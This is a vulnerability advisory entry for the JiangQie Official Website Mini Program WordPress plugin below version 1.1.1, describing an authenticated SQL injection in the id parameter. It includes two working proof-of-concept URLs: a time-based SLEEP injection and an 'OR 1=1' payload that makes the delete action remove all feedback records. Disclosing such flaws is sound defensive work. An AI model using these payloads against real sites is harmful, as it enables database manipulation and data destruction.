Lucene search

K
wpexploit[email protected] incWPEX-ID:CBD65B7D-D3C3-4EE3-8E5E-FF0EEEAA7B30
HistoryJul 30, 2021 - 12:00 a.m.

JiangQie Official Website Mini Program < 1.1.1 - Authenticated SQL Injection

2021-07-3000:00:00
356

0.001 Low

EPSS

Percentile

50.1%

The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues

https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29

Could also make a logged in admin delete all the records: https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1

0.001 Low

EPSS

Percentile

50.1%

Related for WPEX-ID:CBD65B7D-D3C3-4EE3-8E5E-FF0EEEAA7B30